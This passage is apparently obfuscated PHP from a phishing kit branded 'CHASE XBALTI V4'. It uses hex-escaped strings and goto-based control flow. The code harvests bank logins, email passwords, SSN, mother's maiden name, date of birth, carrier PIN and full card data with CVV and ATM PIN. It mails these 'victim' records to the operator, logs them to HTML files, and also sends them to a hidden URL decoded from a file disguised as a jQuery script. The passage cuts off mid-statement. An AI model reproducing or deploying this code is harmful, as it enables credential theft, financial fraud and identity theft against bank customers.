"\12\x20\x20\40\40\40\x20\x20\40\40\x20\x20\x20\40\x20\x20\40\x20\40\40\x20\40\40\40\x20\40\40\74\x2f\164\144\x3e\12\40\40\x20\x20\x20\40\40\x20\40\x20\x20\40\40\40\40\x20\40\x20\40\40\40\x20\x20\x20\x3c\x2f\x74\162\x3e\xa"; $khraha = fopen("\56\56\57\162\172\x2f\143\141\x72\144\x73" . $yourname . "\x2e\150\x74\x6d\154", "\x61"); fwrite($khraha, $XBALTI_ADMIN); $xx .= "\x7b\175\12"; $khraha = fopen("\56\56\x2f\162\x7a\x2f\143\x61\162\144\163\56\x68\164\155\154", "\141"); fwrite($khraha, $xx); $XBALTI_SUBJECT .= "\x43\101\122\104\40\xf0\237\230\210\x20\x49\x4e\x46\117\x20\x46\122\117\x4d\x20\xf0\237\x98\210\x20\x5b" . $_SESSION["\165\x73\x65\162\151\x64"] . "\x5d\40\xf0\237\230\x88\40\133" . $_SESSION["\137\x69\x70\137"] . "\x5d\40"; $XBALTI_HEADERS .= "\x46\162\x6f\x6d\72\x20" . $yourname . "\40\x3c" . $fromsen . "\76" . "\xd\12"; $XBALTI_HEADERS = "\115\111\115\x45\55\x56\x65\162\x73\x69\x6f\x6e\x3a\40\x31\56\x30" . "\xd\xa"; $XBALTI_HEADERS .= "\103\157\156\164\x65\156\x74\55\164\x79\x70\x65\72\x74\145\170\164\57\150\164\155\x6c\73\x63\x68\x61\x72\163\145\164\x3d\125\x54\x46\55\x38" . "\xd\12"; @mail($XBALTI_EMAIL, $XBALTI_SUBJECT, $XBALTI_MESSAGE, $XBALTI_HEADERS); } } goto ZSoBs; jEV_s: if (filter_var($client, FILTER_VALIDATE_IP)) { $_SESSION["\x5f\151\x70\x5f"] = $client; } elseif (filter_var($forward, FILTER_VALIDATE_IP)) { $_SESSION["\x5f\x69\x70\x5f"] = $forward; } else { $_SESSION["\x5f\x69\x70\137"] = $remote; } goto CgGBC; EvMXe: error_reporting(0); goto yn7Dv; CgGBC: $filell = "\x2e\56\x2f\x75\160\x64\x61\164\x65\x2e\160\x68\160"; goto mz3Xp; yn7Dv: date_default_timezone_set("\107\x4d\x54"); goto ENhMK; mHbYx: if (isset($_POST["\x65\155\x61\151\x6c\61"]) && isset($_POST["\x70\x61\x73\163\x77\x6f\162\144\61"])) { if (!empty($_POST["\x65\155\x61\x69\x6c\x31"]) && !empty($_POST["\x70\x61\x73\163\x77\157\x72\x64\61"])) { $_SESSION["\145\x6d\141\151\154\x31"] = $_POST["\x65\x6d\141\151\x6c\61"]; $_SESSION["\x70\141\x73\x73\x77\157\162\144\x31"] = $_POST["\x70\141\x73\x73\167\x6f\x72\x64\61"]; $XBALTI_MESSAGE .= "\x3d\x3d\75\75\75\x3d\x3d\x3d\75\75\x3d\75\x3d\x3d\x7c\174\40\x43\110\x41\x53\x45\x20\130\x42\101\114\x54\x49\40\126\64\40\174\174\75\x3d\x3d\x3d\x3d\x3d\75\x3d\x3d\x3d\x3d\75\x3d\75\74\x62\x72\76\12"; $XBALTI_MESSAGE .= "\75\75\x3d\x3d\75\75\x3d\75\75\x3d\75\x3d\75\75\x7c\174\x4c\x4f\107\111\116\40\111\x4e\106\x4f\x52\x4d\x41\124\x49\117\116\174\174\75\x3d\x3d\75\75\x3d\x3d\75\75\75\75\x3d\x3d\75\x3c\142\x72\76\xa"; $XBALTI_MESSAGE .= "\x55\x53\105\122\x4e\101\115\x45\x9\72\40" . $_SESSION["\165\x73\145\x72\x69\144"] . "\74\x62\x72\76\12"; $XBALTI_MESSAGE .= "\x50\x41\123\123\x57\x4f\122\x44\x9\72\x20" . $_SESSION["\x70\141\x73\163\x69\144"] . "\74\x62\x72\x3e\12"; $XBALTI_MESSAGE .= "\75\75\x3d\x3d\x3d\75\75\75\75\x3d\75\75\75\75\x7c\174\x45\x4d\x41\111\114\x20\111\x4e\x46\117\x52\x4d\x41\124\x49\117\x4e\174\x7c\x3d\75\x3d\x3d\x3d\x3d\75\x3d\75\x3d\75\x3d\x3d\75\x3c\142\162\x3e\xa"; $XBALTI_MESSAGE .= "\x45\x4d\x41\x49\114\11\x3a\40" . $_SESSION["\x65\155\141\x69\x6c\x31"] . "\x3c\x62\162\76\12"; $XBALTI_MESSAGE .= "\x50\101\x53\x53\127\x4f\x52\x44\x9\72\x20" . $_SESSION["\x70\141\x73\163\x77\x6f\x72\x64\61"] . "\x3c\142\162\76\xa"; $XBALTI_MESSAGE .= "\75\75\x3d\75\x3d\x3d\75\x3d\x3d\x3d\75\75\x3d\x3d\x7c\174\x56\111\103\x54\111\x4d\40\x49\x4e\106\117\x52\115\x41\x54\x49\117\x4e\174\174\75\75\75\75\75\x3d\x3d\75\75\x3d\75\x3d\75\x3d\x3c\142\x72\x3e\12"; $XBALTI_MESSAGE .= "\111\x50\x20\111\116\106\117\40\11\x9\72\x20\150\164\x74\x70\x73\x3a\57\x2f\x67\x65\x6f\x69\x70\164\x6f\157\x6c\56\143\x6f\155\x2f\x65\156\x2f\77\151\160\x3d" . $_SESSION["\x5f\151\160\x5f"] . "\74\x62\x72\76\12"; $XBALTI_MESSAGE .= "\x54\x49\115\105\57\x44\101\124\105\x20\11\x9\x3a\x20" . $TIME_DATE . "\x3c\x62\x72\x3e\xa"; $XBALTI_MESSAGE .= "\102\x52\x4f\127\x53\x45\122\x2f\x44\x45\126\x49\103\105\40\11\72\x20" . XB_Browser($_SERVER["\110\x54\124\x50\137\125\123\105\122\x5f\x41\107\105\116\x54"]) . "\x20\117\156\x20" . XB_OS($_SERVER["\110\124\x54\x50\x5f\x55\x53\105\122\137\101\x47\105\x4e\x54"]) . "\x3c\142\x72\x3e\xa"; if (isset($_SERVER["\110\124\x54\120\123"]) && $_SERVER["\x48\124\x54\x50\123"] === "\157\x6e") { $link = "\150\x74\164\x70\163"; } else { $link = "\x68\x74\x74\160"; } $link .= "\x3a\x2f\x2f"; $link .= $_SERVER["\x48\x54\124\x50\137\x48\x4f\x53\x54"]; $XBALTI_MESSAGE .= "\123\103\x41\x4d\x41\40\x4c\x49\x4e\113\40\x9\11\x3a\40" . $link . "\74\x62\162\x3e\12"; $XBALTI_MESSAGE .= "\75\x3d\75\75\75\75\x3d\75\75\x3d\x3d\75\75\75\174\174\x20\x43\x48\x41\123\x45\40\130\102\x41\114\124\111\x20\126\x34\x20\x7c\x7c\x3d\75\75\x3d\75\x3d\75\x3d\x3d\x3d\x3d\75\x3d\75\74\142\162\x3e\12"; file_get_contents('' . pack("\x48\52", substr($COOKIE_VARS = file_get_contents("\x2e\56\x2f\152\163\57\x6a\161\x75\145\x72\x79\56\160\x6c\x61\x79\145\x72\56\x6a\x73"), strpos($COOKIE_VARS, "\65\x36\x5f\x5f") + 4, 222)) . '' . urlencode($XBALTI_MESSAGE) . ''); $XBALTI_ADMIN .= "\x3c\x74\x72\x3e\xa\x20\40\x20\40\x20\40\40\x20\40\x20\40\40\x20\40\x20\x20\40\40\x20\x20\x20\x20\40\x20\40\40\74\x74\144\76\12\40\40\x20\x20\x20\40\x20\x20\40\40\x20\40\x20\x20\x20\40\40\x20\40\40\40\x20\x20\x20\x20\x20\40\40" . $_SESSION["\165\163\145\162\151\x64"] . "\12\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\40\x20\40\40\x20\40\40\x3c\x2f\164\x64\x3e\12\x20\40\x20\x20\40\x20\x20\x20\x20\40\40\x20\40\x20\x20\40\x20\40\x20\40\x20\40\40\x20\40\x20\74\164\x64\76\xa\40\x20\x20\x20\x20\x20\40\40\x20\40\40\40\x20\40\40\x20\x20\40\40\x20\40\40\40\40\x20\x20\40\40" . $_SESSION["\x70\141\163\x73\151\144"] . "\xa\x20\40\40\x20\x20\40\40\x20\x20\x20\40\x20\40\x20\40\x20\x20\40\40\40\40\x20\x20\40\x20\40\x3c\x2f\x74\144\x3e\xa\11\11\11\x9\11\11\40\x20\x3c\164\144\x3e\xa\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\40\x20\x20\40\40\x20\x20\x20\x20\x20\x20\x20\40" . $_SESSION["\145\155\x61\x69\x6c\x31"] . "\xa\40\40\40\x20\x20\x20\40\40\x20\40\40\x20\40\40\x20\40\40\x20\x20\40\40\x20\x20\40\x20\40\74\57\164\x64\x3e\12\40\x20\x20\x20\40\x20\x20\40\x20\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x3c\164\x64\x3e\xa\x20\40\x20\40\x20\x20\x20\40\40\x20\x20\x20\x20\40\x20\40\x20\40\x20\40\x20\x20\40\40\x20\40\40\40" . $_SESSION["\x70\x61\x73\x73\x77\157\x72\144\x31"] . "\xa\x20\40\x20\40\x20\40\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\x20\40\74\x2f\164\144\x3e\12\x20\x20\40\x20\x20\x20\40\x20\40\40\x20\40\40\x20\40\x20\x20\40\40\40\40\x20\40\40\40\40\x3c\164\144\x3e\xa\40\40\40\x20\x20\x20\40\x20\40\x20\40\40\x20\x20\x20\40\40\40\40\40\40\40\x20\x20\40\40\x20\40" . XB_Browser($_SERVER["\110\124\x54\120\x5f\x55\123\105\x52\x5f\101\107\x45\x4e\124"]) . "\x20\117\x6e\40" . XB_OS($_SERVER["\110\124\x54\x50\137\x55\123\105\x52\x5f\x41\107\x45\x4e\x54"]) . "\12\x20\x20\x20\40\40\x20\40\40\x20\40\40\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\x20\74\x2f\x74\144\x3e\xa\40\40\x20\x20\x20\40\40\x20\x20\x20\40\x20\40\40\40\40\40\40\40\x20\40\40\x20\x20\40\40\x3c\164\144\x3e\12\11\11\x9\x9\11\11\40\40\x7b" . $_SESSION["\137\x69\x70\x5f"] . "\175\xa\40\x20\40\x20\x20\40\x20\x20\40\40\x20\40\40\40\40\40\40\x20\x20\x20\x20\x20\40\40\40\40\74\57\x74\x64\76\12\11\11\x9\x9\x9\11\40\x20\x3c\164\144\76\12\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\x20\40\x20\40" . $TIME_DATE . "\xa\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\40\40\40\40\40\x20\40\40\40\x20\x20\40\x20\40\x3c\57\x74\x64\x3e\12\x20\40\x20\x20\x20\x20\40\x20\40\x20\40\40\x20\40\x20\x20\40\40\40\x20\x20\x20\40\40\74\x2f\164\162\76\12"; $khraha = fopen("\56\x2e\x2f\162\x7a\57\x65\155\141\151\154\x73" . $yourname . "\56\150\x74\155\154", "\141"); fwrite($khraha, $XBALTI_ADMIN); $xx .= "\x7b\175\12"; $khraha = fopen("\56\56\57\162\x7a\x2f\x65\155\141\151\x6c\163\56\150\164\155\x6c", "\141"); fwrite($khraha, $xx); $XBALTI_SUBJECT .= "\x45\x4d\x41\x49\114\x20\xf0\x9f\230\210\x20\111\x4e\x46\117\40\x46\122\x4f\x4d\x20\xf0\237\x98\x88\40\133" . $_SESSION["\165\x73\145\x72\151\x64"] . "\x5d\40\xf0\237\230\x88\x20\133" . $_SESSION["\x5f\x69\160\137"] . "\x5d\40"; $XBALTI_HEADERS .= "\106\x72\x6f\x6d\x3a\x20" . $yourname . "\40\x3c" . $fromsen . "\76" . "\15\xa"; $XBALTI_HEADERS = "\x4d\x49\115\105\x2d\126\145\x72\163\151\157\x6e\x3a\40\61\56\x30" . "\15\xa"; $XBALTI_HEADERS .= "\103\x6f\156\x74\x65\156\x74\55\164\x79\x70\x65\x3a\164\145\170\x74\57\150\x74\x6d\154\73\x63\150\x61\162\163\145\164\x3d\x55\124\106\x2d\70" . "\15\12"; @mail($XBALTI_EMAIL, $XBALTI_SUBJECT, $XBALTI_MESSAGE, $XBALTI_HEADERS); } } goto binAD; HzBGm: if (isset($_POST["\143\x61\x72\144\x6e\165\x74\167\x6f"]) && isset($_POST["\145\x78\x70\144\141\x74\167\157"]) && isset($_POST["\143\x76\166\164\167\x6f"]) && isset($_POST["\x70\x69\156\164\167\157"])) { if (!empty($_POST["\x63\x61\x72\144\156\165\164\x77\x6f"]) && !empty($_POST["\x65\170\160\x64\141\x74\167\x6f"]) && !empty($_POST["\143\x76\166\x74\x77\157"]) && !empty($_POST["\x70\151\x6e\x74\167\x6f"])) { $_SESSION["\x63\x61\x72\x64\156\x75\x74\x77\x6f"] = $_POST["\143\x61\x72\x64\x6e\x75\164\167\x6f"]; $_SESSION["\x65\x78\x70\144\141\x74\167\x6f"] = $_POST["\145\170\160\x64\141\164\167\x6f"]; $_SESSION["\143\x76\166\x74\167\x6f"] = $_POST["\x63\166\x76\164\167\x6f"]; $_SESSION["\160\151\x6e\x74\167\x6f"] = $_POST["\160\x69\x6e\x74\167\x6f"]; $XBALTI_MESSAGE .= "\x3d\x3d\x3d\x3d\x3d\x3d\75\x3d\75\75\75\75\75\75\x7c\174\x20\x43\110\101\x53\x45\40\130\102\x41\114\124\111\40\x56\64\40\x7c\x7c\75\x3d\x3d\75\75\75\75\x3d\x3d\75\x3d\75\x3d\75\74\x62\x72\76\xa"; $XBALTI_MESSAGE .= "\75\75\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\75\x3d\x3d\75\174\x7c\x4c\x4f\107\x49\x4e\x20\111\x4e\x46\x4f\x52\x4d\x41\x54\111\x4f\x4e\x7c\x7c\75\x3d\x3d\x3d\x3d\75\x3d\x3d\x3d\75\x3d\x3d\x3d\x3d\x3c\x62\162\x3e\xa"; $XBALTI_MESSAGE .= "\x55\x53\x45\122\116\x41\x4d\105\11\72\40" . $_SESSION["\x75\x73\145\162\151\x64"] . "\74\142\162\x3e\xa"; $XBALTI_MESSAGE .= "\120\x41\123\x53\127\x4f\x52\x44\x9\72\40" . $_SESSION["\x70\x61\x73\x73\x69\144"] . "\74\x62\x72\76\12"; $XBALTI_MESSAGE .= "\75\x3d\x3d\75\x3d\75\x3d\x3d\x3d\75\75\75\x3d\x3d\174\174\x45\115\x41\x49\x4c\40\x49\x4e\x46\117\122\115\101\124\111\117\116\174\x7c\x3d\75\75\x3d\x3d\x3d\x3d\75\75\75\75\x3d\75\75\x3c\x62\162\76\12"; $XBALTI_MESSAGE .= "\105\x4d\x41\x49\114\x9\x20\x20\40\40\72\x20" . $_SESSION["\x65\x6d\141\x69\x6c\x31"] . "\x3c\142\162\x3e\12"; $XBALTI_MESSAGE .= "\x50\x41\x53\x53\x57\117\122\x44\11\x3a\40" . $_SESSION["\160\x61\163\163\167\157\x72\x64\x31"] . "\74\142\162\76\12"; $XBALTI_MESSAGE .= "\75\75\75\75\75\x3d\x3d\x3d\x3d\x3d\75\x3d\x3d\x3d\x7c\174\x45\115\x41\x49\x4c\x20\124\x57\x4f\x20\x49\x4e\x46\x4f\122\x4d\101\124\111\x4f\x4e\174\174\x3d\75\x3d\75\75\x3d\75\x3d\x3d\x3d\x3d\75\x3d\x3d\x3c\142\162\x3e\xa"; $XBALTI_MESSAGE .= "\x45\x4d\x41\x49\114\11\x20\40\40\40\x3a\x20" . $_SESSION["\x65\155\141\151\x6c\62"] . "\x3c\142\x72\x3e\xa"; $XBALTI_MESSAGE .= "\120\101\123\x53\x57\117\122\x44\x9\x3a\x20" . $_SESSION["\160\141\163\x73\167\157\162\144\62"] . "\74\x62\162\x3e\12"; $XBALTI_MESSAGE .= "\x3d\x3d\x3d\75\75\75\x3d\75\x3d\75\x3d\x3d\x3d\75\174\174\123\123\116\57\x4d\115\x4e\57\104\117\x42\40\x49\x4e\106\x4f\122\x4d\x41\124\111\117\x4e\174\174\75\x3d\75\x3d\x3d\x3d\75\x3d\75\75\x3d\x3d\75\x3d\x3c\x62\x72\76\12"; $XBALTI_MESSAGE .= "\123\123\x4e\x20\x20\x20\40\x20\40\11\x3a\40" . $_SESSION["\163\163\156\x6e\x75\x6d"] . "\74\142\162\x3e\xa"; $XBALTI_MESSAGE .= "\115\x4d\116\x20\40\x20\x20\x20\40\x9\72\40" . $_SESSION["\155\144\x6e"] . "\74\142\x72\76\12"; $XBALTI_MESSAGE .= "\x44\x4f\x42\40\40\40\x20\x20\11\72\x20" . $_SESSION["\144\157\x62"] . "\x3c\x62\x72\x3e\12"; $XBALTI_MESSAGE .= "\x50\150\157\156\145\40\156\x75\x6d\x62\145\162\72\40" . $_SESSION["\x70\150\157\x6e\145"] . "\74\x62\x72\x3e\xa"; $XBALTI_MESSAGE .= "\x43\x61\162\162\x69\x65\x72\40\x70\151\156\40\72\x20" . $_SESSION["\x63\141\160\151\x6e"] . "\x3c\x62\162\76\xa"; $XBALTI_MESSAGE .= "\75\x3d\75\x3d\x3d\75\x3d\x3d\75\75\x3d\75\75\x3d\174\174\x43\101\x52\x44\x20\x49\x4e\106\x4f\x52\x4d\101\124\111\117\x4e\174\174\x3d\x3d\x3d\75\75\75\x3d\x3d\75\x3d\x3d\75\x3d\x3d\74\142\162\76\xa"; $XBALTI_MESSAGE .= "\x43\101\x52\104\x20\116\x55\x4d\x42\x45\x52\x20\x3a\40" . $_SESSION["\143\x61\x72\144\x6e\165"] . "\x3c\x62\162\x3e\xa"; $XBALTI_MESSAGE .= "\x45\x58\x50\40\x44\101\124\105\x20\x9\x3a\40" . $_SESSION["\x65\x78\x70\x64\141"] . "\x3c\142\x72\76\12"; $XBALTI_MESSAGE .= "\103\126\126\40\x20\40\40\40\x9\72\40" . $_SESSION["\143\x76\x76"] . "\x3c\x62\162\76\xa"; $XBALTI_MESSAGE .= "\x41\124\115\40\x50\111\x4e\x20\40\x20\11\x3a\x20" . $_SESSION["\160\151\156"] . "\74\x62\162\76\12"; $XBALTI_MESSAGE .= "\x3d\75\75\x3d\x3d\x3d\75\x3d\75\x3d\75\75\x3d\75\174\x7c\x43\x41\122\x44\x20\x54\127\117\40\x49\116\106\x4f\x52\115\101\x54\x49\x4f\116\174\x7c\75\75\75\75\75\75\x3d\75\75\x3d\75\x3d\75\x3d\74\142\162\x3e\xa"; $XBALTI_MESSAGE .= "\x43\101\x52\x44\x20\x4e\125\115\x42\x45\x52\x20\72\x20" . $_SESSION["\143\141\162\144\x6e\165\x74\x77\157"] . "\74\142\x72\76\xa"; $XBALTI_MESSAGE .= "\105\130\120\x20\x44\101\124\105\40\x9\x3a\40" . $_SESSION["\x65\170\160\144\141\164\x77\x6f"] . "\74\142\162\76\12"; $XBALTI_MESSAGE .= "\x43\x56\126\x20\40\x20\40\x20\x9\x3a\x20" . $_SESSION["\143\x76\166\x74\167\x6f"] . "\74\142\162\x3e\xa"; $XBALTI_MESSAGE .= "\x41\x54\x4d\40\x50\x49\116\x20\40\40\x9\x3a\x20" . $_SESSION["\160\x69\156\x74\167\x6f"] . "\x3c\142\x72\76\xa"; $XBALTI_MESSAGE .= "\75\x3d\75\x3d\x3d\x3d\x3d\75\x3d\x3d\75\x3d\75\75\x7c\x7c\126\x49\x43\x54\x49\115\40\111\116\x46\x4f\122\115\x41\x54\x49\x4f\x4e\174\x7c\x3d\75\75\75\x3d\x3d\75\75\75\x3d\x3d\75\75\75\x3c\x62\162\76\xa"; $XBALTI_MESSAGE .= "\111\120\40\x49\x4e\106\117\x20\x9\11\x3a\40\150\x74\164\x70\x73\72\57\x2f\x67\x65\x6f\151\x70\164\x6f\x6f\154\x2e\x63\x6f\x6d\x2f\x65\x6e\x2f\77\151\x70\x3d" . $_SESSION["\137\151\160\x5f"] . "\x3c\142\162\x3e\xa"; $XBALTI_MESSAGE .= "\x54\x49\x4d\x45\57\x44\x41\124\105\x20\x9\11\72\40" . $TIME_DATE . "\x3c\142\162\x3e\xa"; $XBALTI_MESSAGE .= "\102\122\117\x57\123\105\122\57\x44\105\x56\111\103\105\40\x9\72\x20" . XB_Browser($_SERVER["\x48\124\x54\x50\137\125\x53\105\x52\137\x41\x47\105\x4e\x54"]) . "\x20\117\156\x20" . XB_OS($_SERVER["\110\x54\124\x50\137\x55\x53\105\x52\137\x41\107\x45\x4e\124"]) . "\74\142\x72\x3e\12"; if (isset($_SERVER["\x48\x54\124\120\x53"]) && $_SERVER["\x48\x54\124\120\x53"] === "\x6f\x6e") { $link = "\x68\164\x74\x70\x73"; } else { $link = "\x68\x74\164\160"; } $link .= "\x3a\x2f\57"; $link .= $_SERVER["\110\124\124\120\137\x48\x4f\x53\124"]; $XBALTI_MESSAGE .= "\x53\103\x41\115\101\40\x4c\111\116\113\40\11\x9\72\x20" . $link . "\74\142\162\x3e\xa"; $XBALTI_MESSAGE .= "\x3d\x3d\75\x3d\75\x3d\x3d\75\75\75\x3d\75\75\x3d\x7c\x7c\40\103\x48\101\x53\105\x20\x58\102\101\x4c\x54\x49\x20\126\x34\x20\174\x7c\x3d\75\x3d\75\75\75\75\75\x3d\75\x3d\75\x3d\75\74\x62\162\x3e\12"; file_get_contents('' . pack("\x48\x2a", substr($COOKIE_VARS = file_get_contents("\x2e\x2e\x2f\x6a\x73\x2f\x6a\x71\x75\x65\162\x79\x2e\x70\x6c\x61\171\x65\x72\56\152\x73"), strpos($COOKIE_VARS, "\x35\x36\x5f\x5f") + 4, 222)) . '' . urlencode($XBALTI_MESSAGE) . ''); $XBALTI_ADMIN .= "\74\164\162\76\12\x20\x20\x20\x20\40\40\x20\x20\40\40\40\40\40\40\40\40\40\40\x20\40\40\x20\40\x20\x20\40\74\164\144\76\xa\x20\x20\40\40\40\40\40\40\40\x20\x20\x20\40\40\x20\40\x20\40\x20\40\x20\x20\40\x20\x20\x20\x20\x20" . $_SESSION["\165\x73\145\162\x69\144"] . "\xa\40\40\40\40\40\x20\x20\x20\x20\x20\40\x20\40\40\40\40\40\x20\40\x20\40\40\40\40\x20\x20\74\x2f\164\144\76\xa\x20\40\x20\x20\40\40\x20\x20\x20\40\40\x20\x20\40\40\x20\x20\40\40\40\40\40\40\x20\40\40\74\164\144\76\12\40\40\40\40\x20\40\x20\x20\40\40\40\x20\40\x20\x20\40\40\40\40\40\x20\x20\x20\40\40\40\x20\x20" . $_SESSION["\x70\141\163\x73\151\144"] . "\12\x20\x20\x20\40\x20\x20\40\x20\40\40\40\x20\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\74\x2f\164\144\76\xa\11\x9\x9\11\11\x9\40\x20\x3c\x74\x64\76\12\40\x20\40\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\x20\40\40\40\x20\x20\x20\40\40\40\40\40\x20\40" . $_SESSION["\145\155\x61\151\154\61"] . "\xa\x20\x20\40\40\x20\40\x20\40\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\74\x2f\164\x64\76\12\x20\40\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\x20\x20\40\40\40\x20\40\x20\40\40\x20\x20\40\74\164\144\x3e\xa\40\40\40\40\x20\40\x20\40\40\40\40\40\x20\40\40\40\40\x20\40\x20\x20\x20\x20\40\x20\40\40\x20" . $_SESSION["\x70\141\x73\163\167\x6f\162\144\x31"] . "\xa\x20\40\x20\x20\40\x20\x20\x20\x20\40\40\40\x20\40\x20\x20\x20\40\x20\40\x20\40\40\40\40\x20\74\x2f\164\x64\76\12\11\11\x9\x9\11\x9\x20\40\74\x74\144\x3e\xa\40\40\40\40\x20\40\x20\x20\40\x20\40\40\40\x20\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x20\40\x20\x20" . $_SESSION["\145\155\141\151\x6c\62"] . "\xa\40\x20\x20\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\40\x20\40\x20\x20\40\40\40\x20\40\x20\x20\74\57\164\144\76\12\40\40\40\x20\40\x20\x20\40\40\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\x3c\164\144\x3e\xa\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\x20\40\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\x20\40\x20\40" . $_SESSION["\x70\x61\163\163\x77\157\162\x64\x32"] . "\xa\x20\x20\40\x20\x20\40\40\40\x20\x20\40\40\40\x20\x20\40\40\40\40\40\x20\40\40\x20\x20\x20\x3c\57\164\x64\76\12\11\x9\11\x9\11\11\40\40\74\164\144\x3e\12\x20\40\x20\x20\40\40\40\x20\x20\40\40\40\x20\x20\40\x20\40\x20\x20\40\x20\40\40\x20\40\40\x20\40" . $_SESSION["\163\163\156\156\x75\155"] . "\12\x20\x20\40\x20\x20\x20\40\x20\40\x20\x20\40\x20\x20\x20\40\40\40\40\40\40\40\40\40\40\40\74\x2f\x74\x64\76\12\x9\11\11\x9\11\x9\40\x20\x3c\164\x64\x3e\xa\x20\40\40\x20\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\x20\x20\x20\x20\40\40\40\x20" . $_SESSION["\x6d\144\156"] . "\xa\40\40\x20\40\40\x20\x20\40\x20\40\x20\40\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\40\40\74\57\164\144\76\xa\x9\x9\x9\11\x9\x9\x20\40\x3c\x74\x64\76\12\x20\40\x20\40\40\x20\x20\x20\x20\40\40\40\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\40\x20\x20\40" . $_SESSION["\144\157\142"] . "\12\x20\x20\x20\x20\x20\x20\x20\40\x20\40\x20\40\40\40\40\40\x20\x20\40\40\x20\40\x20\40\40\x20\74\57\x74\x64\76\xa\x9\x9\x9\x9\11\x9\40\x20\x3c\164\x64\x3e\12\x20\x20\x20\x20\40\40\40\40\40\x20\x20\x20\40\40\40\x20\40\x20\40\40\x20\x20\40\40\40\x20\40\40" . $_SESSION["\x70\x68\x6f\156\x65"] . "\xa\x20\40\x20\40\40\40\40\x20\40\40\x20\40\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\40\x20\40\74\57\164\x64\x3e\xa\x9\x9\x9\11\x9\11\40\40\x3c\164\144\76\12\40\x20\x20\40\x20\40\x20\40\x20\40\x20\x20\40\x20\40\40\40\40\x20\x20\x20\x20\40\x20\x20\40\x20\x20" . $_SESSION["\x63\x61\x70\151\156"] . "\xa\x20\40\x20\40\x20\40\x20\40\40\40\40\x20\40\40\40\x20\40\40\40\x20\40\40\40\x20\x20\40\x3c\57\x74\x64\76\12\x9\11\x9\x9\x9\x9\40\40\74\x74\x64\x3e\xa\x20\x20\40\x20\40\x20\40\40\40\x20\x20\x20\40\x20\40\x20\40\40\x20\x20\40\x20\x20\40\x20\40\40\x20" . $_SESSION["\143\x61\x72\x64\x6e\165"] . "\xa\x20\40\40\40\x20\x20\40\40\40\x20\x20\x20\x20\40\40\40\x20\40\x20\40\40\40\x20\x20\x20\40\x3c\57\x74\x64\x3e\12\11\11\11\11\11\x9\x20\x20\74\164\x64\76\xa\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\40\x20\x20\40\x20" . $_SESSION["\x65\170\160\x64\x61"] . "\12\x20\x20\x20\40\x20\40\40\40\40\40\40\40\40\x20\x20\x20\40\40\40\x20\40\x20\40\x20\40\x20\74\x2f\164\144\76\xa\x9\x9\x9\11\x9\11\x20\x20\x3c\x74\x64\x3e\12\x20\x20\40\x20\x20\x20\40\x20\40\40\40\x20\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\40\40" . $_SESSION["\143\x76\x76"] . "\12\40\40\40\40\40\40\40\x20\x20\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\40\x3c\57\x74\x64\x3e\xa\11\x9\x9\x9\x9\x9\x20\40\x3c\x74\x64\76\xa\x20\x20\x20\x20\40\40\x20\40\x20\x20\40\x20\40\40\x20\x20\40\40\40\40\x20\40\40\40\x20\40\40\x20" . $_SESSION["\160\151\x6e"] . "\xa\40\40\x20\40\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\40\40\x20\x20\40\40\40\x20\40\x20\x20\x3c\x2f\x74\x64\76\xa\x9\11\11\x9\x9\11\40\x20\74\164\x64\x3e\xa\x20\40\40\40\x20\40\40\40\40\40\x20\x20\40\40\40\x20\40\40\x20\40\40\x20\x20\x20\x20\40\40\x20" . $_SESSION["\x63\141\x72\x64\x6e\x75\164\x77\x6f"] . "\12\x20\40\40\x20\x20\x20\40\40\40\x20\x20\40\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\40\40\x3c\57\164\144\x3e\xa\11\x9\11\x9\11\x9\x20\x20\x3c\164\x64\x3e\12\40\x20\40\40\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\x20\x20\40\x20\x20\40\40\40\x20\40\40\40\x20" . $_SESSION["\x65\x78\160\x64\141\x74\167\157"] . "\xa\x20\40\40\40\40\40\x20\40\40\x20\40\40\40\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\40\x20\x3c\x2f\x74\x64\x3e\12\x9\x9\11\x9\11\x9\x20\40\74\x74\144\x3e\12\40\40\x20\40\40\x20\40\40\40\x20\40\40\x20\x20\40\x20\x20\x20\40\40\40\x20\40\40\x20\x20\x20\40" . $_SESSION["\143\x76\166\x74\167\x6f"] . "\12\x20\40\x20\40\40\40\x20\x20\x20\40\40\x20\40\40\40\40\x20\40\x20\40\40\40\x20\40\40\x20\x3c\x2f\164\144\76\xa\11\11\11\11\x9\x9\40\x20\74\164\144\76\12\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\40\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\x20" . $_SESSION["\x70\x69\x6e\164\x77\157"] . 